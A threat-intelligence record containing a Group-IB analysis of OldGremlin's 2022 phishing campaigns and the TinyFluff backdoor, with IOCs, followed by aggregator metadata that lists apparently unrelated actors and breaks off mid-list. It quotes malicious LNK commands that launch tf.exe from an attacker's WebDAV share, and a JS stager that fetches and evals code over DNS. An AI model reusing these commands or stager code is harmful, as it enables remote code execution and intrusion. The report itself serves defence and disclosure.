{
	"id": "e9aa2252-b8e8-417f-b160-947a0ec149fa",
	"created_at": "2026-04-06T00:09:30.043674Z",
	"updated_at": "2026-04-10T03:36:13.891382Z",
	"deleted_at": null,
	"sha1_hash": "d9056345b03e60f700efe8c67e0187c4975a7fb4",
	"title": "OldGremlin group, phishing ransomware comeback | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 163926,
	"plain_text": "Ivan Pisarev\r\nTechnical Head, META\r\nOld Gremlins, new methods\r\nRussian-speaking ransomware gang OldGremlin resumes attacks in Russia\r\nApril 14, 2022 · Ransomware\r\nhttps://www.group-ib.com/blog/oldgremlin-comeback/\r\n
Until recently, Russian-speaking cyber threat actors shared an unspoken rule: do not attack Russian companies. Groups that violated the rule were few and far between, and OldGremlin was one of them. Since spring 2020, when the “gremlins” were first uncovered by Group-IB Threat Intelligence analysts, the hackers have been attacking Russian businesses, including banks, industrial enterprises, medical organizations, and software developers.\r\n
According to Group-IB, a Singapore-based cybersecurity company, over the past two years OldGremlin has conducted 13 malicious email campaigns. The year 2020 was the most fruitful: ten campaigns, with emails purporting to be from a Russian metallurgical holding, the Belarusian plant MTZ, a dental clinic, and the media holding RBC. Nine of them were described in Group-IB’s 2020 report; one more was discovered later that year.\r\n
After the first attacks, it became clear that OldGremlin prepares its phishing emails with great care and monitors the news agenda closely. Email subjects included remote work during the pandemic, protests in Belarus, and an interview request from a well-known financial journalist working for the Russian media outlet RBC.\r\n
Another OldGremlin hallmark is that the group conducts multi-stage targeted attacks using sophisticated tactics and techniques. 
For example, they did not send their TinyCryptor ransomware directly by email; instead they first obtained remote access to a victim’s machine and used it as a springboard for reconnaissance, data collection, and lateral movement across the organization’s network.\r\n
OldGremlin history\r\n
OldGremlin launched only one mass phishing email campaign in 2021 (in February), but it was so successful that, apparently, it fueled the gang for the entire year. A few months later, the Group-IB team discovered that the February email campaign had been the initial entry point and source of a number of attacks. Moreover, last year OldGremlin became the greediest cybergang targeting Russia: they demanded as much as $3 million from one of their victims.\r\n
In late March 2022, OldGremlin put themselves back on the radar with two malicious email campaigns. As in past attacks, the group bombarded Russian companies with another batch of emails exploiting trending news topics. This time they played the sanctions card, masquerading as representatives of a Russian financial organization.\r\n
Given that many international providers of email security products have suspended operations on the Russian market, the campaigns of OldGremlin and other threat actors that use email at the initial stage are likely to become more successful and more frequent.\r\n
Having identified one potential victim (a mining company), the Group-IB Computer Emergency Response Team (CERT-GIB) warned the company in question about the threat.\r\n
In this blog post, Group-IB experts share technical descriptions of OldGremlin’s new attacks and tools and map the group’s main tactics, techniques and procedures (TTPs) to the MITRE ATT\u0026CK™ framework.\r\n
March 22 Campaign\r\n
A new OldGremlin attack was detected on March 22, 2022. 
The attackers had registered the domain mirfinance[.]org with Namecheap on March 2 and set it up with the public email service Yandex.Mail (the domain’s SPF record simply redirects to _spf.yandex.net); the malicious emails to Russian companies were sent from it. Using a legitimate public email service sometimes allows attackers to bypass traditional security controls, because mail from a well-known provider is less likely to be blocked on sender reputation alone.\r\n
DNS records for mirfinance[.]org. Source: Group-IB Threat Intelligence\r\n
As mentioned above, carefully crafted phishing emails are OldGremlin’s hallmark. This time the emails were allegedly sent by a senior accountant of a financial organization in Russia who warned the recipients about new sanctions that would completely suspend operations of the Visa and Mastercard payment systems. Notably, the phishing emails were sent two weeks after Visa and Mastercard announced they would suspend operations in Russia.\r\n
“All cards issued in our country [Russia] will no longer work,” the phishing email said, prompting the recipients to urgently issue a new banking card and link it to the bank payroll.\r\n
OldGremlin’s phishing email from the March 22 campaign\r\n
To have a new payment card “issued”, the recipient was supposed to read the guidelines and fill out a questionnaire. In reality, the emails contained links to a malicious document stored in Dropbox: hxxps://dl[.]dropboxusercontent[.]com/s/1956cypkkihawuu/Anketa.docx?dl=0. The document looked as follows:\r\n
Malicious document stored in Dropbox\r\n
It is noteworthy that in February 2021, the threat actor sent emails leveraging a malicious document containing a similar Office 365 image. 
The campaign affected multiple companies, and OldGremlin is still reaping the benefits, as they are known for dwelling in victims’ infrastructure for a long time before proceeding to the next stage.\r\n
To return to the recent attack, the infection scheme is presented below for clarity:\r\n
OldGremlin’s March 22 attack\r\n
Once opened, the document loads a template located at hxxps://dl[.]dropboxusercontent[.]com/s/gjyjs0rbtihy7ue/Doc1.dotm. The template contains a macro that performs the following actions:\r\n
1. Copies the original file (Anketa.docx) to the path %TEMP%\\docx1.zip.\r\n
2. Extracts an executable file from the archive embedded in the original document (a .docx is itself a ZIP container) to the path %TEMP%\\word\\media\\image2.jpg, renames the file to image2.exe and launches it.\r\n
3. Displays an error and closes the document.\r\n
The archive contained the group’s new tool, which, judging by the PDB string (Z:\\TinyFluff\\Release\\TinyFluff.pdb), the developer named TinyFluff. TinyFluff is a successor to the gang’s custom backdoor TinyNode, which OldGremlin used as the primary downloader for receiving and running malicious scripts. The purpose of TinyFluff is to launch the Node.js interpreter on the infected device and grant remote access to it (a detailed description is given in the “Tools” section).\r\n
The key features of this version of TinyFluff are:\r\n
1. The application downloads Node.js from the official website.\r\n
2. The JavaScript payload is embedded in the file body.\r\n
3. It does not contain a hardcoded command and control (C2) address; instead the application uses a domain generation algorithm (DGA).\r\n
4. All communication with C2 servers is performed through a DNS tunnel.\r\n
Among the generated domains, two definitely belonged to the attackers. The rest were either not registered at the time of analysis or Group-IB experts could not find evidence that they were involved in the attack:\r\n
Domain | NS subdomains | IP addresses of NS subdomains\r\n
eccbc8[.]com | ns1[.]eccbc8[.]com, ns2[.]eccbc8[.]com, ns3[.]eccbc8[.]com, ns4[.]eccbc8[.]com | 46.101.113[.]161, 161.35.41[.]9\r\n
a3c65c[.]org | ns1[.]a3c65c[.]org, ns2[.]a3c65c[.]org, ns3[.]a3c65c[.]org, ns4[.]a3c65c[.]org | 46.101.113[.]161, 161.35.41[.]9\r\n
We will return to the table above, but for now we will continue to describe the cyber kill chain.\r\n
Group-IB’s Managed XDR extracted some of the JavaScripts used in this campaign. In particular, Group-IB detected an interesting, though still “raw”, script with wide functionality:\r\n
Communication with the C2 server through a DNS tunnel\r\n
Gathering information about infected devices\r\n
Stealing files from infected devices\r\n
Downloading arbitrary files from servers\r\n
Deploying a SOCKS server to proxy traffic\r\n
Executing arbitrary JS code\r\n
March 25 Campaign\r\n
Three days later, on March 25, the group launched a new campaign, but with a simpler toolkit. The likely reason is that the final-stage script used in the previous attack was not yet ready for full-fledged use in the wild: it required additional testing and additional features. The bad news is that OldGremlin will most likely perfect the script and use it in future attacks.\r\n
Unfortunately, Group-IB has not yet uncovered any email samples (if you have received one, please let us know), but our specialists did reconstruct the second attack.\r\n
OldGremlin’s March 25 attack\r\n
The attack was identified following the analysis of OldGremlin’s infrastructure. 
Group-IB discovered two LNK files associated with the IP address 46.101.113[.]161 (used to resolve NS records for subdomains from the previous malicious email campaign). Both files were located in archives available for download from Dropbox:\r\n
Name | SHA1 | Links\r\n
Akt_sverki.zip | dda9900cefa8cdc8ec362d80480ba6c4cfdc62b2 | hXXps://dl.dropboxuser…, hXXps://dl.dropboxuser…, hXXps://dl.dropboxuser…, hXXps://dl.dropboxuser…\r\n
DopSog_Consult.zip | ae52c93c16c63aac9be778e89157b67c7bc7c61c | hXXps://dl.dropboxuser…dl=0, hXXps://dl.dropboxuser…\r\n
Group-IB experts believe that the above links were embedded in the emails sent by the group.\r\n
When launched, the LNK files executed the following commands:\r\n
DopSog_Consultant.docx.lnk:\r\n
“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start \\\\192.248.176[.]138\\DavWWWRoot\\DopSog_Consultant.docx \u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\n
Akt_sverki_Consultant.docx.lnk:\r\n
“%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start \\\\192.248.176[.]138\\DavWWWRoot\\Akt_sverki_Consultant.docx \u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\n
Here is what happened: using the WebDAV protocol, the command mapped the remote share hxxp://192.248.176[.]138 (net use against an http:// URL goes through the Windows WebClient service), opened the decoy document (DopSog_Consultant.docx or Akt_sverki_Consultant.docx) from the DavWWWRoot path, and launched the malicious executable tf.exe from the same share in the background (start /b). The decoy documents looked as follows:\r\n
Decoy document Akt_sverki_Consultant.docx (Translation: Reconciliation certificate)\r\n
Decoy document DopSog_Consultant.docx (Translation: Supplementary Agreement). Obviously, the legitimate company Consultant Plus has nothing to do with the documents used in the campaign.\r\n
The payload, as you may have guessed, is TinyFluff. Unlike the file used in the March 22 campaign, however, this version does not have a built-in script and does not download the Node.js interpreter from the official website. Instead, the application copies both the script and the interpreter from its own current location, i.e., from the WebDAV share on 192.248.176[.]138.\r\n
The final-stage script is much simpler than the version described above. It lacks both DGA (the IP address 46.101.113[.]161 is hardcoded as C2) and data encryption. In fact, all communication between the Trojan and C2 could be viewed with an ordinary traffic sniffer.\r\n
Group-IB experts retrieved several JS commands that were executed on the infected device. They were all designed to obtain information about the infected device and even included CMD commands (as described in the corresponding section).\r\n
Tools used by OldGremlin group\r\n
TinyFluff\r\n
As mentioned above, Group-IB experts detected two versions of TinyFluff:\r\n
Campaign date | SHA1\r\n
2022-03-25 | c82e12e563d5d5f4a8dd67703b5df7373b457abc\r\n
2022-03-22 | bd0a6a3628f268a37ac9d708d03f57feef5ed55e\r\n
Let’s begin with the tf.exe file (SHA1: c82e12e563d5d5f4a8dd67703b5df7373b457abc), as the tool is much simpler than its predecessor. Once launched, the application creates the directory %APPDATA%\\%MachineGuid%, where %MachineGuid% is the registry value HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid. If the directory already exists, the application terminates itself (a simple reinfection guard). The application copies the Node.js interpreter (node.exe) and the malicious script s.txt to the created directory. 
The script is heavily obfuscated, but if it can be run there is no need to waste time on de-obfuscation, because the obfuscated layer simply restarts Node.js and passes a “clean” script to it as a command-line argument.\r\n
How the Malware Detonation Platform module of Group-IB Managed XDR displays the attack\r\n
As seen in the screenshot, the argument of the second node.exe process is an unobfuscated script. Its functionality is simple: it connects to 46.101.113[.]161:80, sends a bot identifier of the form 0.[0-9]* (a number between 0 and 1), then receives commands in a loop and executes them with eval. The commands are described in detail in the relevant section.\r\n
Although the other version of TinyFluff (SHA1: bd0a6a3628f268a37ac9d708d03f57feef5ed55e) was discovered earlier and has the earlier compilation timestamp (2022-03-20, versus 2022-03-24 for tf.exe), it is the more sophisticated of the two. Just like the version above, it places the script and the interpreter in the directory %APPDATA%\\%MachineGuid%. However, the interpreter is downloaded from the official website, http://nodejs.org/dist/latest-erbium/win-x86/node.exe (the Node.js 12 “Erbium” LTS line, 32-bit build), and the malicious script is stored in a resource of the executable named TXT. As in the above case, the de-obfuscated script can be obtained from the argument of the node.exe child process:\r\n
Source: Group-IB Managed XDR\r\n
This time the script is more complicated. For example, it does not have a built-in C2 list; instead it uses a DGA that takes the MD5 of a counter, keeps the first six hex characters and appends one of three TLDs (as reconstructed by the analysts):\r\n
const a=[0…0x1e4]\r\nconst tld=[\".com\",\".org\",\".net\"],\r\ndomain=crypto.createHash(\"md5\").update(a.toString()).digest(\"hex\").slice(0,6)+tld[f]\r\n
For each domain, the script generates a subdomain in the format [0-9a-f]{4}.[0-9a-f]{8}.%dga_domain%, creates a DNS query, and receives a TXT record.
The tool carries out all communication through a DNS tunnel, which means that all data transmitted by the Trojan is encoded into subdomains of the query name and the server’s response is carried in a TXT record. We will not dwell on this any further, as we believe that all interaction with the server occurs in this way.\r\n
The script verifies the digital signature of the received data using the function crypto.verify with the base64-encoded key MCowBQYDK2VwAyEAgp0p9o6lg/ZZ3WUJtx7UBBb1qYMZEDNC19Hbb84wt88= (a DER-encoded SubjectPublicKeyInfo whose algorithm identifier is OID 1.3.101.112, i.e., an Ed25519 public key). Only the operator holding the matching private key can therefore issue tasking that the bot will accept, even if someone else registers one of the DGA domains. If the signature is valid, the script generates a bot identifier (a number between 0 and 1), after which it requests a command from the C2 server in a loop. The response is obfuscated. De-obfuscation is performed as follows:\r\n
1. The data is Base64-decoded.\r\n
2. The data is decrypted using the RC4 algorithm (in such requests, the key is %id%.%dga_domain%, i.e., the bot identifier followed by the domain to which the connection was made).\r\n
3. The decrypted data is decompressed using the gzip algorithm.\r\n
The algorithm described above is used to de-obfuscate all traffic between the malware and the C2 server, with only the key changing (going forward we will therefore only say that the data is de-obfuscated using a given key). After de-obfuscation, the resulting JS script is immediately executed by the interpreter. The textual description is complicated, so let’s illustrate it using a sample analyzed by the Malware Detonation Platform. Registration looked as follows:\r\n
The example above shows that the domain eccbc8[.]com was generated using the DGA and that 0.058106102444631436 is the bot’s unique identifier. The screenshot shows two TXT responses, but at this stage we are only interested in the first one:\r\n
Vl1Ok4WH0QkAA3xSgGwyotPYGd0Q4X4LeLYTqO0mgklgbunlqCBxhnEilFysI2UrJWKsy0Q+B\r\n
We will return to the second response later. 
If you use the following script (Base64-decode, RC4-decrypt with the given key, gunzip):\r\n
crypto=require(\"crypto\"),\r\nglobal.dec=(key,ciphertext)=\u003e{\r\n  // base64 -> RC4(key) -> gunzip, the three steps described above\r\n  const a=require(\"crypto\").createDecipheriv(\"rc4\",key,null),\r\n        k=a.update(ciphertext,\"base64\"),\r\n        b=require(\"zlib\").gunzipSync(k);\r\n  return a.final(),b.toString()\r\n}\r\n
with the key 0.058106102444631436.eccbc8[.]com, you will receive the first command:\r\n
let C = 0, P = \"\", K = \"lin9gtmn\", R = () =\u003e {\r\n  require(\"dns\").resolveTxt(\"0x\" + C + \".\" + K + \".eccbc8[.]com\", (e, d) =\u003e {\r\n    if (d) {\r\n      // append this chunk; after 23 chunks, decode with key K and run the result\r\n      if (P += d.join(\"\"), C++, C \u003c 23) return R();\r\n      try { eval(global.dec(K, P)) } catch (a) {}\r\n    }\r\n  })\r\n};\r\nR()\r\n
As can be seen, the first command is designed to download and run the next-stage tool. To do so, it performs 23 DNS TXT queries of the form 0x%chunk_number%.lin9gtmn.eccbc8[.]com, concatenates the responses into a string, de-obfuscates it using the key lin9gtmn, and launches the result with eval. (The de-obfuscation script above relies on OpenSSL exposing RC4; on Node.js builds linked against OpenSSL 3 it must be started with --openssl-legacy-provider, or RC4 implemented by hand.) An example of such requests:\r\n
0x0.lin9gtmn.eccbc8[.]com 0x1.lin9gtmn.eccbc8[.]com ... 
0x22.lin9gtmn.eccbc8[.]com\r\n
The resulting script has many functions, including:\r\n
Sending multiple DNS queries at the same time\r\n
Gathering information about infected devices\r\n
Stealing files from infected devices\r\n
Downloading arbitrary files from servers\r\n
Deploying a SOCKS server to proxy traffic\r\n
It is noteworthy that at the time of analysis the resulting script was unfinished: Group-IB researchers came across errors in the script code, and the persistence function was commented out. Moreover, of all the functions listed above, the script only performs one, namely collecting information about the infected device into a JSON object of the following format:\r\n
{\r\n  \"transfer\": { \"threads\": \"global.threads\", \"tick\": \"global.tick\", \"domain\": \"global.dom\" },\r\n  \"paths\": { \"temp\": \"os.tmpdir()\", \"home\": \"os.homedir()\" },\r\n  \"proc\": { \"load\": \"os.loadavg()\", \"cpus\": \"os.cpus()\" },\r\n  \"mem\": { \"total\": \"os.totalmem()\", \"free\": \"os.freemem()\" },\r\n  \"network\": { \"interfaces\": \"os.networkInterfaces()\" },\r\n  \"sys\": { \"hostName\": \"os.hostname()\", \"type\": \"os.type()\", \"platform\": \"os.platform()\", \"release\": \"os.release()\", \"uptime\": \"os.uptime()\" },\r\n  \"user\": \"os.userInfo()\"\r\n}\r\n
The data is once again obfuscated using the lin9gtmn key, hex-encoded, split into chunks of 60 characters (a single DNS label cannot exceed 63 octets), and sent as several requests in the following format:\r\n
1x%chunk_number%.%key%.%random_string{8}%.%hex_chunk%.eccbc8[.]com\r\n
Polygon example:\r\n
1x2.lin9gtmn.v937nf2g.01e35a4076d1b5a1f285b49c11d2a96230b8ce152e9b3877243b7e5234\r\n
In response, the server sends an obfuscated JavaScript to be executed. In our case, Group-IB experts did not receive any additional commands. However, do you remember that we planned to return to the second response? 
Here it is:\r\n
The second command from the server after de-obfuscation looks as follows:\r\n
if(global.connect)global.connect()\r\n
This script runs the second large piece of code in the final-stage script. First, the code makes a request to the server in order to obtain connection parameters. The request is as follows:\r\n
2x.%uid%.%id%%rand_string{2}%.%dga_domain%\r\n
Polygon example:\r\n
2x.058106102444631436.079i4mjd6c.eccbc8[.]com\r\n
The response is data in the format %threads%:%width%:%expire%, obfuscated with the %id% key. To avoid overloading the article with in-depth technical details, we will not describe these fields in full. We will only note that they control the number of simultaneous DNS requests, the number of simultaneously processed commands from the server, and the run time of the command handler script.\r\n
Having obtained the connection parameters, the script launches the function used to handle commands from the server. The function requests commands with:\r\n
3x.%uid%.%dga_domain%\r\n
Polygon example:\r\n
3x.058106102444631436.eccbc8[.]com\r\n
The script processes the following commands:\r\n
Command | Parameter | Short description\r\n
(empty line) | File name | Download the file to the infected device. The command parameters are parsed with an error, so this code path cannot execute correctly.\r\n
.download: | File description | Read the contents of a file from the working directory.\r\n
.set: | threads, tick_sec | Change the parameters for connecting to the server, where threads is the number of simultaneously executed DNS requests and tick_sec is the interval for requesting a new command.\r\n
Any other | – | The output will be forwarded to this.proc.stdin.\r\n
It is worth noting that this section of the code logs the progress of its work, but in order to transfer data to the server it uses the function this.send (not defined in the code). The function accepts this.proc.stdout as the first argument. Moreover, the result of the .download: command is processed in the same way. This evidence may indicate that this piece of code is still under development.\r\n
The code also contains two functions whose names speak for themselves: _socks and _eval. Group-IB experts have not seen them being used in the code, which means that they can probably be called on the server’s command. Moreover, the threat actors commented out the part of the script that ensures persistence in the system by creating the file OneDrive.cmd in the Microsoft\\Windows\\Start Menu\\Programs\\Startup directory and adding to it a command that starts the Node.js interpreter with the s.txt argument.\r\n
Commands\r\n
As mentioned above, on March 25 Group-IB experts obtained and analyzed several commands. The commands were used for reconnaissance, after which the attackers (or their script) realized that the application had been launched in a test environment and sent a command to terminate the interpreter. 
All commands were sent in clear text, which made it possible to examine them using a traffic sniffer:\r\n
An example of traffic between an infected device and a server\r\n
Commands can be divided by functionality into six scripts that perform the following actions:\r\n
1. Collecting information about the infected system/device: CPU; computer name and memory capacity; network information (IP and MAC addresses); OS information; path to the %Temp% directory; system uptime.\r\n
2. Obtaining information about connected drives.\r\n
3. Launching the cmd.exe shell, executing a command, and sending the output to C2. During our research, the following commands were executed: ipconfig /all; kill.\r\n
4. Obtaining information about the plugins installed in the system. At the time of research no plugins had been loaded, so we have only their names: TSFR, SHLL, NESC, PRSE/PRST, FWSE, SPPU/SPPR, SRPU/SRPR, ATSE.\r\n
5. Obtaining information about files in the following directories: the directory in which the malicious script and the Node.js interpreter are located; C:\\; C:\\Users; C:\\Users\\\u003c%username%\u003e; C:\\Users\\\u003c%username%\u003e\\Downloads.\r\n
6. Terminating the Node.js interpreter.\r\n
Group-IB researchers did not manage to obtain more commands during the analysis, but even based on this short list we can conclude that OldGremlin has prepared enough scripts for full-fledged post-exploitation.\r\n
Conclusion\r\n
After a break of more than a year, in March 2022 the ransomware gang OldGremlin resumed its malicious email campaigns targeting Russian companies. They remain one of the very few Russian-speaking ransomware gangs operating in Russia. As in their past attacks, the gremlins used carefully crafted fake emails, an up-to-date news agenda, and new custom tools. The latter included TinyFluff, which we analyzed in detail. We have reason to believe that the new campaigns may have infected a large number of companies and that in the coming months the attackers will slowly and carefully move through their infrastructure, bypassing existing security systems.\r\n
To prevent ransomware attacks, Group-IB recommends that companies use Group-IB Managed XDR to protect their infrastructure against targeted attacks and proactively hunt for threats using Threat Intelligence data. We also advise cybersecurity analysts to explore the list of OldGremlin’s tactics, techniques and procedures shared below, which is mapped to the MITRE ATT\u0026CK matrix. Group-IB’s Threat Intelligence team will continue to monitor the group’s activities and promptly notify customers about any new attacks.\r\n
IOCs\r\n
Network\r\n
Domains\r\n
mirfinance[.]org\r\n  Registrar: Namecheap, Inc\r\n  Registered: 2022-03-02\r\n  Expires: 2023-03-02\r\n  TXT record: v=spf1 redirect=_spf.yandex.net\r\n  IP: 192.64.119[.]190\r\n
eccbc8[.]com\r\n  Registrar: Namecheap, Inc\r\n  Registered: 2022-03-02\r\n  Expires: 2023-03-02\r\n  IP: –\r\n
a3c65c[.]org\r\n  Registrar: Namecheap, Inc\r\n  Registered: 2021-12-07\r\n  Expires: 2022-12-07\r\n  IP: –\r\n
Domain | NS subdomains | IP addresses of NS subdomains\r\n
eccbc8[.]com | ns1[.]eccbc8[.]com, ns2[.]eccbc8[.]com, ns3[.]eccbc8[.]com, ns4[.]eccbc8[.]com | 46.101.113[.]161, 161.35.41[.]9\r\n
a3c65c[.]org | ns1[.]a3c65c[.]org, ns2[.]a3c65c[.]org, ns3[.]a3c65c[.]org, ns4[.]a3c65c[.]org | 46.101.113[.]161, 161.35.41[.]9\r\n
Files\r\n
2022-03-22\r\n
Anketa.docx (initial malicious document)\r\n  Link: hxxps://dl[.]dropboxusercontent[.]com/s/1956cypkkihawuu/Anketa.docx?dl=0\r\n  MD5: 70F4416F6EC6C0DBF916A717BC4A612F\r\n  SHA1: AF3190DE95DD187661D0866404B087EC7BB8C6BA\r\n  SHA256: 700FC6C697A869CC978D042B024E59C5FCD4E8905C2FBC7CAEEB3760C2905B\r\n  Size: 137,081 bytes\r\n
Doc1.dotm (malicious template)\r\n  Link: hxxps://dl[.]dropboxusercontent[.]com/s/gjyjs0rbtihy7ue/Doc1.dotm\r\n  MD5: 669cd24d66587ebdbb709302ed011c0e\r\n  SHA1: 313c8241e0c74fac52530c55089979ac4763e0e2\r\n  SHA256: 
ea95c527da29ca29072617dce28a567d11a7c777f2fcc2a752d0dff626180e70\r\n  Size: 17,778 bytes\r\n
image2.jpg / image2.exe (TinyFluff, March 22 version)\r\n  MD5: B59B53C35F03CFF659F848297BCF3314\r\n  SHA1: BD0A6A3628F268A37AC9D708D03F57FEEF5ED55E\r\n  SHA256: 4682A66EFA7C79AB56DFDFC1BBA5CF001D380D516FF1B64ACEA0B53784FDE8C\r\n  Size: 104,448 bytes\r\n  Compilation timestamp: 2022-03-20 13:25:12 UTC\r\n  PDB: Z:\\TinyFluff\\Release\\TinyFluff.pdb\r\n
s.txt (final-stage script, March 22 version)\r\n  MD5: FC763A77DFFDBBC62D256524CD4808D9\r\n  SHA1: FAB504D579B2E1AAE8701EA1BDA3F3A8B694927F\r\n  SHA256: 476852E3257631D6AC2882237CFA146DCAEFE17A10A11B984AEC5CC9B61D48D4\r\n  Size: 16,092 bytes\r\n
2022-03-25\r\n
DopSog_Consult.zip (archive with LNK)\r\n  MD5: 3e4ab86263e0ff5a35f2e3fb17d03727\r\n  SHA1: ae52c93c16c63aac9be778e89157b67c7bc7c61c\r\n  SHA256: 09c0ac9e09f91a415f674c6cd27b1cc44d8c695da6a449d6baf70107027af2fa\r\n  Size: 987 bytes\r\n  LNK SHA1: e1b5fc5df05b25fc7136cf9b7ea252e50ebff2ef\r\n
Akt_sverki.zip (archive with LNK)\r\n  MD5: 64db43f22430e75716aacd7ca13bbac6\r\n  SHA1: dda9900cefa8cdc8ec362d80480ba6c4cfdc62b2\r\n  SHA256: f1102cceed4e6529f8c5b1bf387b798bfba727b49c4a7442b19c392335291cab\r\n  Size: 1,002 bytes\r\n  LNK SHA1: 3c1b1942537ee273325b02ec305bb02e2d0a02f8\r\n
Akt_sverki.zip (archive with LNK, second variant)\r\n  MD5: 0c46a727d2b9d6e0d1c3bee3b9e90abf\r\n  SHA1: 1e22af4c6e4dfe625043dddde295fef84bd36ab9\r\n  SHA256: bc7ccad7d1ed91a45e792866ff9a060414c1d3c2f9ae8f06689cb96a2e3957a6\r\n  Size: 1,018 bytes\r\n  LNK SHA1: 3c1b1942537ee273325b02ec305bb02e2d0a02f8\r\n
DopSog_Consultant.docx.lnk (malicious LNK)\r\n  MD5: 858d14841bc1cc90e8e24a51aca814e1\r\n  SHA1: e1b5fc5df05b25fc7136cf9b7ea252e50ebff2ef\r\n  SHA256: f36305e01515b73607f0f8941d9093fabe1b7a7e3f90c18f137403a0f016cdff\r\n  Size: 1,610 bytes\r\n  Command line: “%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start \\\\192.248.176[.]138\\DavWWWRoot\\DopSog_Consultant.docx \u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\n
Akt_sverki_Consultant.docx.lnk (malicious LNK)\r\n  MD5: e8fce013184401fb8d6e248fc91b4f9e\r\n  SHA1: 3c1b1942537ee273325b02ec305bb02e2d0a02f8\r\n  SHA256: 0a0889330501ee52ca5fe2b2f41fbcad7d26afce8bc430c7fe274e6ebe64c680\r\n  Size: 1,618 bytes\r\n  Command line: “%ComSpec%” /c net use hxxp://192.248.176[.]138 \u0026\u0026 start \\\\192.248.176[.]138\\DavWWWRoot\\Akt_sverki_Consultant.docx \u0026\u0026 start /b \\\\192.248.176[.]138\\DavWWWRoot\\tf.exe\r\n
Akt_sverki_Consultant.docx (decoy document)\r\n  MD5: e959fa8191ca2e4dd99932e149668ade\r\n  SHA1: 79526eaf1489762ca1deca358d6742f9c1718ca6\r\n  SHA256: 4ff26fed848df58550c656fb1676a9afded48060381c55d45154a90a3272ba9e\r\n  Size: 22,614 bytes\r\n
DopSog_Consultant.docx (decoy document)\r\n  MD5: 0ead98011c8d777fd2772d41ab990111\r\n  SHA1: 9569f635576ec5460571ca6ee02f9b01f39956ea\r\n  SHA256: 990ef464d76b206e4727ee9ccba9c0be33a278a26116c3c2c839125abc97777f\r\n  Size: 24,551 bytes\r\n
tf.exe (TinyFluff, March 25 version)\r\n  MD5: 9dc7f56d0bb5d7543d0ea4a644110623\r\n  SHA1: c82e12e563d5d5f4a8dd67703b5df7373b457abc\r\n  SHA256: 8f3747775a1bdeae4627763687bdcb2ef325874e7a908f3ec24380c5d2f2b44a\r\n  Size: 88,576 bytes\r\n  Compilation timestamp: 2022-03-24 09:02:10 UTC\r\n  PDB: Z:\\WebFluffPP\\Release\\TinyFluff.pdb\r\n
s.txt (final-stage script, March 25 version)\r\n  MD5: 1ddda12e2a8594bc458dbf22b4b39c27\r\n  SHA1: dbaad9f3af3e48da6ef6a93747b2a1939ffa4b3d\r\n  SHA256: 2b507a5d9af760667e18cd11584816575d102d7e9e1900de29b8513d30f6d65c\r\n  Size: 8,392 bytes",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.group-ib.com/blog/oldgremlin-comeback/"
	],
	"report_names": [
		"oldgremlin-comeback"
	],
	"threat_actors": [
		{
			"id": "a060d952-fc4b-44df-bd0e-ee3606e79f83",
			"created_at": "2022-10-25T16:07:23.920646Z",
			"updated_at": "2026-04-10T02:00:04.790469Z",
			"deleted_at": null,
			"main_name": "OldGremlin",
			"aliases": [],
			"source_name": "ETDA:OldGremlin",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"TinyCryptor",
				"TinyNode",
				"TinyPosh",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e35c1877-f6a5-4e47-8464-ddc943e3b320",
			"created_at": "2023-11-21T02:00:07.390198Z",
			"updated_at": "2026-04-10T02:00:03.476348Z",
			"deleted_at": null,
			"main_name": "OldGremlin",
			"aliases": [],
			"source_name": "MISPGALAXY:OldGremlin",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
